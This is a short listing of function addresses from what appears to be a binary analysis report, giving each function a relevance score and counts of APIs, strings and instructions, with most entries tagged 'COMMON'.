Function 004202E8, Relevance: 249.2, APIs: 123, Strings: 19, Instructions: 696
COMMON

Function 004025B4, Relevance: 15.1, APIs: 10, Instructions: 103
COMMON

Function 00401698, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 131
COMMON

Function 004025A7, Relevance: 140.3, APIs: 68, Strings: 12, Instructions: 348
COMMON

Function 00402566, Relevance: 101.8, APIs: 53, Strings: 5, Instructions: 310
COMMON

Function 0041DC5D, Relevance: 87.7, APIs: 45, Strings: 5, Instructions: 231
COMMON

Function 0041FDD6, Relevance: 58.0, APIs: 30, Strings: 3, Instructions: 240
COMMON

Function 0041FB1A, Relevance: 57.9, APIs: 30, Strings: 3, Instructions: 161
COMMON

Function 0041D85F, Relevance: 54.4, APIs: 26, Strings: 5, Instructions: 112
COMMON

Function 0041DB14, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 83
COMMON

Function 0041DA24, Relevance: 12.1, APIs: 8, Instructions: 60
COMMON

Function 0042020D, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Function 00420D3B, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Function 00420F3C, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Function 1DED46C4, Relevance: 2.8, Strings: 2, Instructions: 253
COMMON

Function 00E27A1F, Relevance: 1.7, APIs: 1, Instructions: 212
threadCOMMON